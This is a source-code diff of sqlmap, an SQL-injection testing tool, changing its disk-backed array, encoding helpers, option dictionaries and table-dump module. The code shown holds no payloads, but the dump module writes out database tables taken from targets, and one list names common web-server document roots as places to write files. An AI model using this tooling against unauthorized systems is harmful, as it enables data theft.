from lib.core.settings import BIGARRAY_CHUNK_LENGTH
|
from lib.core.exception import SqlmapSystemException
|
||||||
|
from lib.core.settings import BIGARRAY_CHUNK_SIZE
|
||||||
|
|
||||||
|
DEFAULT_SIZE_OF = sys.getsizeof(object())
|
||||||
|
|
||||||
|
def _size_of(object_):
|
||||||
|
"""
|
||||||
|
Returns total size of a given object_ (in bytes)
|
||||||
|
"""
|
||||||
|
|
||||||
|
retval = sys.getsizeof(object_, DEFAULT_SIZE_OF)
|
||||||
|
if isinstance(object_, dict):
|
||||||
|
retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(object_.items()))
|
||||||
|
elif hasattr(object_, "__iter__"):
|
||||||
|
retval += sum(_size_of(_) for _ in object_)
|
||||||
|
return retval
|
||||||
|
|
||||||
class Cache(object):
|
class Cache(object):
|
||||||
"""
|
"""
|
||||||
|
@ -28,15 +49,21 @@ class BigArray(list):
|
||||||
|
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
self.chunks = [[]]
|
self.chunks = [[]]
|
||||||
|
self.chunk_length = sys.maxint
|
||||||
self.cache = None
|
self.cache = None
|
||||||
self.length = 0
|
|
||||||
self.filenames = set()
|
self.filenames = set()
|
||||||
|
self._os_remove = os.remove
|
||||||
|
self._size_counter = 0
|
||||||
|
|
||||||
def append(self, value):
|
def append(self, value):
|
||||||
self.chunks[-1].append(value)
|
self.chunks[-1].append(value)
|
||||||
if len(self.chunks[-1]) >= BIGARRAY_CHUNK_LENGTH:
|
if self.chunk_length == sys.maxint:
|
||||||
|
self._size_counter += _size_of(value)
|
||||||
|
if self._size_counter >= BIGARRAY_CHUNK_SIZE:
|
||||||
|
self.chunk_length = len(self.chunks[-1])
|
||||||
|
self._size_counter = None
|
||||||
|
if len(self.chunks[-1]) >= self.chunk_length:
|
||||||
filename = self._dump(self.chunks[-1])
|
filename = self._dump(self.chunks[-1])
|
||||||
del(self.chunks[-1][:])
|
|
||||||
self.chunks[-1] = filename
|
self.chunks[-1] = filename
|
||||||
self.chunks.append([])
|
self.chunks.append([])
|
||||||
|
|
||||||
|
@ -47,8 +74,13 @@ class BigArray(list):
|
||||||
def pop(self):
|
def pop(self):
|
||||||
if len(self.chunks[-1]) < 1:
|
if len(self.chunks[-1]) < 1:
|
||||||
self.chunks.pop()
|
self.chunks.pop()
|
||||||
with open(self.chunks[-1], "rb") as fp:
|
try:
|
||||||
self.chunks[-1] = pickle.load(fp)
|
with open(self.chunks[-1], "rb") as fp:
|
||||||
|
self.chunks[-1] = pickle.load(fp)
|
||||||
|
except IOError, ex:
|
||||||
|
errMsg = "exception occurred while retrieving data "
|
||||||
|
errMsg += "from a temporary file ('%s')" % ex
|
||||||
|
raise SqlmapSystemException, errMsg
|
||||||
return self.chunks[-1].pop()
|
return self.chunks[-1].pop()
|
||||||
|
|
||||||
def index(self, value):
|
def index(self, value):
|
||||||
|
@ -57,21 +89,41 @@ class BigArray(list):
|
||||||
return index
|
return index
|
||||||
return ValueError, "%s is not in list" % value
|
return ValueError, "%s is not in list" % value
|
||||||
|
|
||||||
def _dump(self, value):
|
def _dump(self, chunk):
|
||||||
handle, filename = tempfile.mkstemp(prefix="sqlmapba-")
|
try:
|
||||||
self.filenames.add(filename)
|
handle, filename = tempfile.mkstemp()
|
||||||
os.close(handle)
|
self.filenames.add(filename)
|
||||||
with open(filename, "w+b") as fp:
|
os.close(handle)
|
||||||
pickle.dump(value, fp)
|
with open(filename, "w+b") as fp:
|
||||||
return filename
|
pickle.dump(chunk, fp, pickle.HIGHEST_PROTOCOL)
|
||||||
|
return filename
|
||||||
|
except (OSError, IOError), ex:
|
||||||
|
errMsg = "exception occurred while storing data "
|
||||||
|
errMsg += "to a temporary file ('%s'). Please " % ex
|
||||||
|
errMsg += "make sure that there is enough disk space left. If problem persists, "
|
||||||
|
errMsg += "try to set environment variable 'TEMP' to a location "
|
||||||
|
errMsg += "writeable by the current user"
|
||||||
|
raise SqlmapSystemException, errMsg
|
||||||
|
|
||||||
def _checkcache(self, index):
|
def _checkcache(self, index):
|
||||||
if (self.cache and self.cache.index != index and self.cache.dirty):
|
if (self.cache and self.cache.index != index and self.cache.dirty):
|
||||||
filename = self._dump(self.cache.data)
|
filename = self._dump(self.cache.data)
|
||||||
self.chunks[self.cache.index] = filename
|
self.chunks[self.cache.index] = filename
|
||||||
if not (self.cache and self.cache.index == index):
|
if not (self.cache and self.cache.index == index):
|
||||||
with open(self.chunks[index], "rb") as fp:
|
try:
|
||||||
self.cache = Cache(index, pickle.load(fp), False)
|
with open(self.chunks[index], "rb") as fp:
|
||||||
|
self.cache = Cache(index, pickle.load(fp), False)
|
||||||
|
except IOError, ex:
|
||||||
|
errMsg = "exception occurred while retrieving data "
|
||||||
|
errMsg += "from a temporary file ('%s')" % ex
|
||||||
|
raise SqlmapSystemException, errMsg
|
||||||
|
|
||||||
|
def __getstate__(self):
|
||||||
|
return self.chunks, self.filenames
|
||||||
|
|
||||||
|
def __setstate__(self, state):
|
||||||
|
self.__init__()
|
||||||
|
self.chunks, self.filenames = state
|
||||||
|
|
||||||
def __getslice__(self, i, j):
|
def __getslice__(self, i, j):
|
||||||
retval = BigArray()
|
retval = BigArray()
|
||||||
|
@ -84,8 +136,8 @@ class BigArray(list):
|
||||||
def __getitem__(self, y):
|
def __getitem__(self, y):
|
||||||
if y < 0:
|
if y < 0:
|
||||||
y += len(self)
|
y += len(self)
|
||||||
index = y / BIGARRAY_CHUNK_LENGTH
|
index = y / self.chunk_length
|
||||||
offset = y % BIGARRAY_CHUNK_LENGTH
|
offset = y % self.chunk_length
|
||||||
chunk = self.chunks[index]
|
chunk = self.chunks[index]
|
||||||
if isinstance(chunk, list):
|
if isinstance(chunk, list):
|
||||||
return chunk[offset]
|
return chunk[offset]
|
||||||
|
@ -94,8 +146,8 @@ class BigArray(list):
|
||||||
return self.cache.data[offset]
|
return self.cache.data[offset]
|
||||||
|
|
||||||
def __setitem__(self, y, value):
|
def __setitem__(self, y, value):
|
||||||
index = y / BIGARRAY_CHUNK_LENGTH
|
index = y / self.chunk_length
|
||||||
offset = y % BIGARRAY_CHUNK_LENGTH
|
offset = y % self.chunk_length
|
||||||
chunk = self.chunks[index]
|
chunk = self.chunks[index]
|
||||||
if isinstance(chunk, list):
|
if isinstance(chunk, list):
|
||||||
chunk[offset] = value
|
chunk[offset] = value
|
||||||
|
@ -112,11 +164,4 @@ class BigArray(list):
|
||||||
yield self[i]
|
yield self[i]
|
||||||
|
|
||||||
def __len__(self):
|
def __len__(self):
|
||||||
return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * BIGARRAY_CHUNK_LENGTH + len(self.chunks[-1])
|
return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * self.chunk_length + len(self.chunks[-1])
|
||||||
|
|
||||||
def __del__(self):
|
|
||||||
for filename in self.filenames:
|
|
||||||
try:
|
|
||||||
os.remove(filename)
|
|
||||||
except:
|
|
||||||
pass
|
|
||||||
|
|
750
lib/core/common.py
Normal file → Executable file
750
lib/core/common.py
Normal file → Executable file
File diff suppressed because it is too large
Load Diff
|
@ -1,10 +1,11 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import base64
|
||||||
import json
|
import json
|
||||||
import pickle
|
import pickle
|
||||||
import sys
|
import sys
|
||||||
|
@ -20,7 +21,7 @@ def base64decode(value):
|
||||||
'foobar'
|
'foobar'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
return value.decode("base64")
|
return base64.b64decode(value)
|
||||||
|
|
||||||
def base64encode(value):
|
def base64encode(value):
|
||||||
"""
|
"""
|
||||||
|
@ -30,7 +31,7 @@ def base64encode(value):
|
||||||
'Zm9vYmFy'
|
'Zm9vYmFy'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
return value.encode("base64")[:-1].replace("\n", "")
|
return base64.b64encode(value)
|
||||||
|
|
||||||
def base64pickle(value):
|
def base64pickle(value):
|
||||||
"""
|
"""
|
||||||
|
@ -41,6 +42,7 @@ def base64pickle(value):
|
||||||
"""
|
"""
|
||||||
|
|
||||||
retVal = None
|
retVal = None
|
||||||
|
|
||||||
try:
|
try:
|
||||||
retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
|
retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
|
||||||
except:
|
except:
|
||||||
|
@ -48,7 +50,11 @@ def base64pickle(value):
|
||||||
warnMsg += "instance of a type '%s'" % type(value)
|
warnMsg += "instance of a type '%s'" % type(value)
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
retVal = base64encode(pickle.dumps(str(value), pickle.HIGHEST_PROTOCOL))
|
try:
|
||||||
|
retVal = base64encode(pickle.dumps(value))
|
||||||
|
except:
|
||||||
|
retVal = base64encode(pickle.dumps(str(value), pickle.HIGHEST_PROTOCOL))
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def base64unpickle(value):
|
def base64unpickle(value):
|
||||||
|
@ -59,7 +65,14 @@ def base64unpickle(value):
|
||||||
'foobar'
|
'foobar'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
return pickle.loads(base64decode(value))
|
retVal = None
|
||||||
|
|
||||||
|
try:
|
||||||
|
retVal = pickle.loads(base64decode(value))
|
||||||
|
except TypeError:
|
||||||
|
retVal = pickle.loads(base64decode(bytes(value)))
|
||||||
|
|
||||||
|
return retVal
|
||||||
|
|
||||||
def hexdecode(value):
|
def hexdecode(value):
|
||||||
"""
|
"""
|
||||||
|
@ -133,17 +146,21 @@ def htmlunescape(value):
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def singleTimeWarnMessage(message): # Cross-linked function
|
def singleTimeWarnMessage(message): # Cross-linked function
|
||||||
pass
|
sys.stdout.write(message)
|
||||||
|
sys.stdout.write("\n")
|
||||||
|
sys.stdout.flush()
|
||||||
|
|
||||||
def stdoutencode(data):
|
def stdoutencode(data):
|
||||||
retVal = None
|
retVal = None
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
data = data or ""
|
||||||
|
|
||||||
# Reference: http://bugs.python.org/issue1602
|
# Reference: http://bugs.python.org/issue1602
|
||||||
if IS_WIN:
|
if IS_WIN:
|
||||||
output = data.encode("ascii", "replace")
|
output = data.encode(sys.stdout.encoding, "replace")
|
||||||
|
|
||||||
if output != data:
|
if '?' in output and '?' not in data:
|
||||||
warnMsg = "cannot properly display Unicode characters "
|
warnMsg = "cannot properly display Unicode characters "
|
||||||
warnMsg += "inside Windows OS command prompt "
|
warnMsg += "inside Windows OS command prompt "
|
||||||
warnMsg += "(http://bugs.python.org/issue1602). All "
|
warnMsg += "(http://bugs.python.org/issue1602). All "
|
||||||
|
@ -157,7 +174,7 @@ def stdoutencode(data):
|
||||||
else:
|
else:
|
||||||
retVal = data.encode(sys.stdout.encoding)
|
retVal = data.encode(sys.stdout.encoding)
|
||||||
except:
|
except:
|
||||||
retVal = data.encode(UNICODE_ENCODING)
|
retVal = data.encode(UNICODE_ENCODING) if isinstance(data, unicode) else data
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -75,7 +75,7 @@ class AttribDict(dict):
|
||||||
for attr in dir(self):
|
for attr in dir(self):
|
||||||
if not attr.startswith('_'):
|
if not attr.startswith('_'):
|
||||||
value = getattr(self, attr)
|
value = getattr(self, attr)
|
||||||
if not isinstance(value, (types.BuiltinFunctionType, types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
|
if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
|
||||||
setattr(retVal, attr, copy.deepcopy(value, memo))
|
setattr(retVal, attr, copy.deepcopy(value, memo))
|
||||||
|
|
||||||
for key, value in self.items():
|
for key, value in self.items():
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -138,7 +138,7 @@ DBMS_DICT = {
|
||||||
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
|
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
|
||||||
DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
|
DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
|
||||||
DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"),
|
DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"),
|
||||||
DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
|
DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
|
||||||
}
|
}
|
||||||
|
|
||||||
FROM_DUMMY_TABLE = {
|
FROM_DUMMY_TABLE = {
|
||||||
|
@ -203,9 +203,11 @@ SQL_STATEMENTS = {
|
||||||
|
|
||||||
POST_HINT_CONTENT_TYPES = {
|
POST_HINT_CONTENT_TYPES = {
|
||||||
POST_HINT.JSON: "application/json",
|
POST_HINT.JSON: "application/json",
|
||||||
|
POST_HINT.JSON_LIKE: "application/json",
|
||||||
POST_HINT.MULTIPART: "multipart/form-data",
|
POST_HINT.MULTIPART: "multipart/form-data",
|
||||||
POST_HINT.SOAP: "application/soap+xml",
|
POST_HINT.SOAP: "application/soap+xml",
|
||||||
POST_HINT.XML: "application/xml",
|
POST_HINT.XML: "application/xml",
|
||||||
|
POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
|
||||||
}
|
}
|
||||||
|
|
||||||
DEPRECATED_OPTIONS = {
|
DEPRECATED_OPTIONS = {
|
||||||
|
@ -213,6 +215,7 @@ DEPRECATED_OPTIONS = {
|
||||||
"--no-unescape": "use '--no-escape' instead",
|
"--no-unescape": "use '--no-escape' instead",
|
||||||
"--binary": "use '--binary-fields' instead",
|
"--binary": "use '--binary-fields' instead",
|
||||||
"--check-payload": None,
|
"--check-payload": None,
|
||||||
|
"--check-waf": None,
|
||||||
}
|
}
|
||||||
|
|
||||||
DUMP_DATA_PREPROCESS = {
|
DUMP_DATA_PREPROCESS = {
|
||||||
|
@ -222,5 +225,5 @@ DUMP_DATA_PREPROCESS = {
|
||||||
|
|
||||||
DEFAULT_DOC_ROOTS = {
|
DEFAULT_DOC_ROOTS = {
|
||||||
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/Inetpub/wwwroot/"),
|
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/Inetpub/wwwroot/"),
|
||||||
OS.LINUX: ("/var/www/",)
|
OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
|
||||||
}
|
}
|
||||||
|
|
144
lib/core/dump.py
144
lib/core/dump.py
|
@ -1,16 +1,18 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import cgi
|
||||||
import codecs
|
import codecs
|
||||||
|
import hashlib
|
||||||
import os
|
import os
|
||||||
|
import re
|
||||||
|
import tempfile
|
||||||
import threading
|
import threading
|
||||||
|
|
||||||
from xml.dom.minidom import getDOMImplementation
|
|
||||||
|
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
from lib.core.common import dataToDumpFile
|
from lib.core.common import dataToDumpFile
|
||||||
from lib.core.common import dataToStdout
|
from lib.core.common import dataToStdout
|
||||||
|
@ -20,7 +22,9 @@ from lib.core.common import normalizeUnicode
|
||||||
from lib.core.common import openFile
|
from lib.core.common import openFile
|
||||||
from lib.core.common import prioritySortColumns
|
from lib.core.common import prioritySortColumns
|
||||||
from lib.core.common import randomInt
|
from lib.core.common import randomInt
|
||||||
|
from lib.core.common import randomStr
|
||||||
from lib.core.common import safeCSValue
|
from lib.core.common import safeCSValue
|
||||||
|
from lib.core.common import unicodeencode
|
||||||
from lib.core.common import unsafeSQLIdentificatorNaming
|
from lib.core.common import unsafeSQLIdentificatorNaming
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
|
@ -32,12 +36,15 @@ from lib.core.enums import DBMS
|
||||||
from lib.core.enums import DUMP_FORMAT
|
from lib.core.enums import DUMP_FORMAT
|
||||||
from lib.core.exception import SqlmapGenericException
|
from lib.core.exception import SqlmapGenericException
|
||||||
from lib.core.exception import SqlmapValueException
|
from lib.core.exception import SqlmapValueException
|
||||||
|
from lib.core.exception import SqlmapSystemException
|
||||||
from lib.core.replication import Replication
|
from lib.core.replication import Replication
|
||||||
from lib.core.settings import HTML_DUMP_CSS_STYLE
|
from lib.core.settings import HTML_DUMP_CSS_STYLE
|
||||||
|
from lib.core.settings import IS_WIN
|
||||||
from lib.core.settings import METADB_SUFFIX
|
from lib.core.settings import METADB_SUFFIX
|
||||||
from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
|
from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
|
||||||
from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
|
from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
|
||||||
from lib.core.settings import UNICODE_ENCODING
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
|
from lib.core.settings import WINDOWS_RESERVED_NAMES
|
||||||
from thirdparty.magic import magic
|
from thirdparty.magic import magic
|
||||||
|
|
||||||
from extra.safe2bin.safe2bin import safechardecode
|
from extra.safe2bin.safe2bin import safechardecode
|
||||||
|
@ -66,17 +73,28 @@ class Dump(object):
|
||||||
if kb.get("multiThreadMode"):
|
if kb.get("multiThreadMode"):
|
||||||
self._lock.acquire()
|
self._lock.acquire()
|
||||||
|
|
||||||
self._outputFP.write(text)
|
try:
|
||||||
|
self._outputFP.write(text)
|
||||||
|
except IOError, ex:
|
||||||
|
errMsg = "error occurred while writing to log file ('%s')" % ex
|
||||||
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
if kb.get("multiThreadMode"):
|
if kb.get("multiThreadMode"):
|
||||||
self._lock.release()
|
self._lock.release()
|
||||||
|
|
||||||
kb.dataOutputFlag = True
|
kb.dataOutputFlag = True
|
||||||
|
|
||||||
|
def flush(self):
|
||||||
|
if self._outputFP:
|
||||||
|
try:
|
||||||
|
self._outputFP.flush()
|
||||||
|
except IOError:
|
||||||
|
pass
|
||||||
|
|
||||||
def setOutputFile(self):
|
def setOutputFile(self):
|
||||||
self._outputFile = "%s%slog" % (conf.outputPath, os.sep)
|
self._outputFile = os.path.join(conf.outputPath, "log")
|
||||||
try:
|
try:
|
||||||
self._outputFP = codecs.open(self._outputFile, "ab" if not conf.flushSession else "wb", UNICODE_ENCODING)
|
self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
|
||||||
except IOError, ex:
|
except IOError, ex:
|
||||||
errMsg = "error occurred while opening log file ('%s')" % ex
|
errMsg = "error occurred while opening log file ('%s')" % ex
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
|
@ -143,7 +161,7 @@ class Dump(object):
|
||||||
def currentDb(self, data):
|
def currentDb(self, data):
|
||||||
if Backend.isDbms(DBMS.MAXDB):
|
if Backend.isDbms(DBMS.MAXDB):
|
||||||
self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
|
self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
|
||||||
elif Backend.isDbms(DBMS.ORACLE):
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL):
|
||||||
self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
|
self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
|
||||||
else:
|
else:
|
||||||
self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB)
|
self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB)
|
||||||
|
@ -367,6 +385,7 @@ class Dump(object):
|
||||||
rtable = None
|
rtable = None
|
||||||
dumpFP = None
|
dumpFP = None
|
||||||
appendToFile = False
|
appendToFile = False
|
||||||
|
warnFile = False
|
||||||
|
|
||||||
if tableValues is None:
|
if tableValues is None:
|
||||||
return
|
return
|
||||||
|
@ -380,15 +399,45 @@ class Dump(object):
|
||||||
self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
|
self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
|
||||||
return
|
return
|
||||||
|
|
||||||
dumpDbPath = "%s%s%s" % (conf.dumpPath, os.sep, unsafeSQLIdentificatorNaming(db))
|
_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(db)))
|
||||||
|
if len(_) < len(db) or IS_WIN and db.upper() in WINDOWS_RESERVED_NAMES:
|
||||||
|
_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
|
||||||
|
dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8]))
|
||||||
|
warnFile = True
|
||||||
|
else:
|
||||||
|
dumpDbPath = os.path.join(conf.dumpPath, _)
|
||||||
|
|
||||||
if conf.dumpFormat == DUMP_FORMAT.SQLITE:
|
if conf.dumpFormat == DUMP_FORMAT.SQLITE:
|
||||||
replication = Replication("%s%s%s.sqlite3" % (conf.dumpPath, os.sep, unsafeSQLIdentificatorNaming(db)))
|
replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db)))
|
||||||
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
|
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
|
||||||
if not os.path.isdir(dumpDbPath):
|
if not os.path.isdir(dumpDbPath):
|
||||||
os.makedirs(dumpDbPath, 0755)
|
try:
|
||||||
|
os.makedirs(dumpDbPath, 0755)
|
||||||
|
except (OSError, IOError), ex:
|
||||||
|
try:
|
||||||
|
tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
|
||||||
|
except IOError, _:
|
||||||
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
|
errMsg += "that you have sufficient write permissions to "
|
||||||
|
errMsg += "create temporary files and/or directories"
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
|
warnMsg = "unable to create dump directory "
|
||||||
|
warnMsg += "'%s' (%s). " % (dumpDbPath, ex)
|
||||||
|
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
dumpDbPath = tempDir
|
||||||
|
|
||||||
|
_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
|
||||||
|
if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
|
||||||
|
_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table)))
|
||||||
|
dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
|
||||||
|
warnFile = True
|
||||||
|
else:
|
||||||
|
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
|
||||||
|
|
||||||
dumpFileName = "%s%s%s.%s" % (dumpDbPath, os.sep, unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())
|
|
||||||
appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop))
|
appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop))
|
||||||
dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab")
|
dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab")
|
||||||
|
|
||||||
|
@ -399,6 +448,10 @@ class Dump(object):
|
||||||
|
|
||||||
columns = prioritySortColumns(tableValues.keys())
|
columns = prioritySortColumns(tableValues.keys())
|
||||||
|
|
||||||
|
if conf.col:
|
||||||
|
cols = conf.col.split(',')
|
||||||
|
columns = sorted(columns, key=lambda _: cols.index(_) if _ in cols else 0)
|
||||||
|
|
||||||
for column in columns:
|
for column in columns:
|
||||||
if column != "__infos__":
|
if column != "__infos__":
|
||||||
info = tableValues[column]
|
info = tableValues[column]
|
||||||
|
@ -442,8 +495,11 @@ class Dump(object):
|
||||||
|
|
||||||
rtable = replication.createTable(table, cols)
|
rtable = replication.createTable(table, cols)
|
||||||
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
documentNode = getDOMImplementation().createDocument(None, "table", None)
|
dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n")
|
||||||
tableNode = documentNode.documentElement
|
dataToDumpFile(dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING)
|
||||||
|
dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table)))
|
||||||
|
dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE)
|
||||||
|
dataToDumpFile(dumpFP, "\n</head>\n<body>\n<table>\n<thead>\n<tr>\n")
|
||||||
|
|
||||||
if count == 1:
|
if count == 1:
|
||||||
self._write("[1 entry]")
|
self._write("[1 entry]")
|
||||||
|
@ -452,14 +508,6 @@ class Dump(object):
|
||||||
|
|
||||||
self._write(separator)
|
self._write(separator)
|
||||||
|
|
||||||
if conf.dumpFormat == DUMP_FORMAT.HTML:
|
|
||||||
headNode = documentNode.createElement("thead")
|
|
||||||
rowNode = documentNode.createElement("tr")
|
|
||||||
tableNode.appendChild(headNode)
|
|
||||||
headNode.appendChild(rowNode)
|
|
||||||
bodyNode = documentNode.createElement("tbody")
|
|
||||||
tableNode.appendChild(bodyNode)
|
|
||||||
|
|
||||||
for column in columns:
|
for column in columns:
|
||||||
if column != "__infos__":
|
if column != "__infos__":
|
||||||
info = tableValues[column]
|
info = tableValues[column]
|
||||||
|
@ -477,12 +525,13 @@ class Dump(object):
|
||||||
else:
|
else:
|
||||||
dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(column), conf.csvDel))
|
